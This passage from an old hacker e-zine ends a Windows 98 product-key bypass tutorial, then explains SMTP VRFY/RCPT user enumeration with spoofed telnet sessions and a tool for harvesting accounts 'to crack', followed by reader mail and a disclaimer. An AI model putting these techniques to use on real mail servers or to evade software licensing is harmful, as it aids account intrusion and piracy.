Double click on each one (one at a time) and change the name of the
Registered Owner and Organization to whatever you want. This will do
nothing if incorrectly done as its only a name. Now for the tricky bit,
just simply change the Product ID to any 25 digit code such as:
*****************************
12345-67891-23456-78912-34567
*****************************
You can also use a made-up number but just make sure it has the gaps
and is just 25 digits and no more. Now click OK to confirm that this is
correct. From here you just simply shutdown Windows the correct way
through the Start Menu and reboot. Windows will then go back into the
setup program and continue the installation, all that we have done is
told the computer that Windows 98 has already been registered so then
it will skip the 25 digit code step and continue from the next
step that is in line.
<*>--------------------------Conclusion-----------------------------<*>
So Bill Gates what happened to your big ass business? Could you not
just make a good operating system with all of that money that you have,
or are you just a miser!! Cause the house that Bill built has crumbled
to it's foundation!!
This may be useful as I have done it and there is no reason why you
shouldn't try it with any other programs or just simply use it with
Windows 98. Send this file to your mates as it will come in useful for
future reference.
(Please note the Windows 9x screens are not set to the same size!)
__ __ __ ________ ___ ___ ____ ___ __
| | | | | | |__ __| | \ / | / __ \ | \ | |
| |_| | | | | | | \/ | / |__| \ | \ | |
| _ | | | | | | |\ /| | / ____ \ | |\ \| |
| | | | | | | | | | \/ | | / / \ \ | | \ |
|__| |__| |__| |__| |__| |__| /__/ \__\ |__| \___|
[-=http://hitman.it.8m.com=-]
[-=vectra500@geocities.com=-]
:..::..End Of File..::..:
:..::.File 12 Of 14.::..:
:..SMTP User Verifying..:
:..::..By NeonBunny.::..:
<*> SMTP User Verifying and Using "User Manager"
+--------------------------------------------+
SMTP vrfy
---------
SMTP is the service that runs on port 25 of most Internet servers, in
normal use it's used for receiving e-mail for people using that server.
A nice little feature of most SMTP packages is the VRFY command which
some e-mail clients use to check that the user it's sending e-mail to
actually exists on that machine and that it won't bounce back as return
mail (this is now built into the RCPT command too).
The majority of SMTP daemons will allow you to issue the VRFY command
without logging onto their mail server (although it can still be
logged, it's not as easy to trace you if you don't send your e-mail
address as a login). The syntax of the VRFY command goes something
like...
Telnet mail.suckerz.com 25
>Hello this is suckerz.com lame mail system v58.3 at your command, how
>can I help?
VRFY test
>Yup I've got a user called "Test Icle" and his e-mail is
<test@suckerz.com>
VRFY billg
>Nope I've got no one here called billg
There are two variations of this that I've come across, the first acts
as above and will tell you if there is or isn't a user of that name on
the server, this is the typical case of most *nix systems running
sendmail. The second variation occurs when the vrfy command has been
turned off and here 2 things can happen either it says that it has
every user you ask it, if this was the case the mail.suckerz.com would
report that it had user test, billg and kjsdhfkj. These can be
identified by VRFY-ing a few hits on the keyboard. This happens on NT's
IIS machines because but instead of removing the command it just tells
you what you want to hear. The other thing you may come across when the
VRFY command has been turned off is a message telling you this and
asking you to use the RCPT command instead, to do this simply log on
with:
HELO www.microsoft.com
give a fake
MAIL FROM: root@hotmail.com
and then either try
RCPT user
or
RCPT user@server.com
and this will tell you if the user exists although won't tell you their
full name as it does with VRFY
Some machines require you to log on and can be identified easily as
below:
Telnet mail.suckerz.com 25
>Hello this is suckerz.com lame mail system v58.3 at your command, how
>can I help?
VRFY test
>Hey log on to me first, I think you should log on with the user name
>the.hackerbox.mil
So it basically knows roughly who you are anyway, by sending the HELO
command this should please the SMTP service enough to let you VRFY or
RCPT users. The HELO command should be in the format of...
HELO 123.123.123.123
or
HELO my.hostname.com
If the machine queries the fake response you may as well give it your
IP since it's already logged anyway. While this will let you past the
nagging "log on" messages chances are you'll just meet a variation 2
service once you've hit a few more keys.
User Manager
------------
User Manager simply automates this process by VRFY and RCPT-ing a list
of users to give you valid accounts to crack (e.g. stevej) as well as
unearthing possible insecure users (e.g. test) or even identifying the
machine's O/S (e.g. nobody4).
Using the file menu load a user list which will pop-up in the top list
box, enter the server in the box under the SMTP category and hit Limit,
this will create a copy of the user file called c:\temp.tmp which it
uses to work from and is deleted at after each scan. The program will
then connect to port 25 of the server and begin VRFY/RCPT-ing users,
the good users appear in the good list and the bad users in the bad
list (obviously) when the process is finished all of the good users are
transferred to the top main user list where typical procedures can be
performed e.g. adding users, removing users and saving.
There is a user list (created by my fair hands) supplied with the
program which has proven to be useful in the past but the program will
work with any user list you may already have.
Future developments may include the ability to crack users directly
from the user list, i.e. a point and click hacker.
NeonBunny
the_neon_bunny@hotmail.com
:..::..End Of File..::..:
:..::.File 13 Of 14.::..:
:.::.You've Got Mail.::.:
:.::.:..By Readers.:.::.:
___________ _____________________________
", / / ___ |"'-.
/ / / / _ \ ___ _____ |!!!!',
/ / / | | \_| / | |_ __| |!!!!!|
/ / / | | |\ | () | | | |!!!!!/
/ / / | |_| | |___/ |/ |!!!!/
/ / / \___/ |!!!/
/ / / /| /| __ /| ___ |!!/
/ / / | \_/ | / '| | | / _ \ |!/
| / / | | | | (| | | |__ | |__/ |/
\ | _.' | |\/| | \___| \___\ \___\
'-._'..-' |/ |/ (!)
<*> Welcome friends. It's that time again, that time we sort out the
flames from the congrats and the questions from the statements. Keep in
mind that we really appreciate all correspondence that we receive. The
latest ascii art logo was designed by GPF#2 (again) thanks man :). The
e-mails are arranged in the order of the date they were received.
:..Everlasting Support..:
From: "Victor Ocampo" <vicman_sabotage@hotmail.com>
To: zengus@yahoo.com
Subject: support
hi! my name's phairygod and i'm a newbie
from the philippines.
can you please send me your previous issues(1&2)?
more power!
<*> <*> <*> <*> <*> <*>
Thanks for contacting us. We informed phairygod that we don't have
time to send old issues to people. By sending his e-mail to the old
address it was clear that he probably saw an old newsgroup post and
didn't know the address of our website, which is understandable. Now
what we would most like to hear from him (and the rest of you) is what
you think of the articles we write (including non staff members). Send
your input as a personal favour to us.
:...Article Submission..:
From: THE MOB BOSS <mafia_man777@yahoo.com>
To: under_p@yahoo.com
Subject: Article Submission
Enclosed find three different articles I have written
in the past year. Please read them over and post which
ever you like in your ezine. Hope you enjoy them and
find them informative. Btw the ethics one is the
oldest and the Mob Boss's Guide To Hacking is the
latest one.
-The Mob Boss; http://mobboss.dragx.cx
<*> <*> <*> <*> <*> <*>
Thanks Mob Boss. Readers can find The Mob Boss's Guide To Hacking in
this month's issue, weighing in at a whopping 30kb.
:.:.:.Some Feedback.:.:.:
From: Firestart <kanall@tinet.ie>
To: zengus@yahoo.com
Subject: Up
hey
i havent been online for a while recently because TE disconnected my
phone line *grrr* but dogs told me about Up and i just read v1 and v2.
Its not bad,HitMan though seems to be a total kiddie, IMO he makes the
zine look bad and his article's seem to be more interested in
destruction than learning. Theirs some handy things in the zine for
win95 boxes if your ever bored in school,but i usually dont bother
wasteing my energy so more *nix related material would be better.
CrossFire's 'UNIX Security Holes' article was quite good but it would
be better if he found the holes instead of taking them from rootshell,
bugtraq etc.Your 'Bouncing your IP' article was good i can see you put
a fair bit of effort into it.
I could of done a better article on meridian mail if you wanted,but i
might do something on conferances,i dont like being rushed though,and
prefer technical things compared to creative things.
just thought id say keep it Up <--heh :)
you should've mentioned it on the hackers_ireland list, you wont get
slagged if its not lame im sure,so you can reply to
Hackers_Ireland@onelist.com if you want to extra plug but id say you do
well enough with alt.ph.uk,i used to get 100+ hits a day on my site
before it went down,just having it in my .sig their :)
PS: bit of complaint,when you say that the people make the zine,and you
want their opinions why do you ridicule their opinions in the second
last section after asking for them?? and another thing: shouldnt the
disclaimer be at the start!
--
We will have solar energy as soon as the utility companies solve one
technical problem -- how to run a sunbeam through a meter.
<*> <*> <*> <*> <*> <*>
Hello Firestart, good to see you back online. We hope you do decide to
write a file on conferences. Don't worry about time, there is no real
rush. There has been some minor tweaking to this e-zine over the
months. For instance, no more taking the piss out of people who take
time out of their lives to e-mail us as you hoped for. The question
about the disclaimer is one asked quite often. The reason it comes at
the end is because it is legally binding no matter where we put it and
this way people needn't have legal bullshit shoved in their faces.
:..::..End Of File..::..:
:..::.File 14 Of 14.::..:
:..Disclaimer & The End.:
:.::.:.By Up Staff.:.::.:
<*> Use this information at your own risk. Staff or contributors to
Underground Periodical, nor the persons providing or hosting
Underground Periodical, will NOT assume ANY responsibility for the use,
misuse, or abuse, of any information provided herein. The previous
information is provided for educational purposes ONLY. This information
is NOT to be used for any illegal purposes whatsoever.
<*> By reading Underground Periodical you ARE AGREEING to the following
terms: I understand that using this information is illegal. I agree to,
and understand, that I am responsible for my own actions. If I get into
trouble using this information for the wrong reasons, I promise not to
place the blame on Underground Periodical staff, contributors, or
anyone that provided this issue or any other issue of Underground
Periodical whether it were official or without notification. I
understand that this information is for educational purposes only.
Thanks for reading.
________ __ __ ______ ______ ___ __ ____
|__ __| | | | | | ___| | ___| | \ | | | _ \
| | | |_| | | |__ | |__ | \ | | | | | \
| | | _ | | __| | __| | |\ \| | | | | |
| | | | | | | |___ | |___ | | \ | | |_| /
|__| |__| |__| |______| |______| |__| \___| |____/
:..::..End Of File..::..:
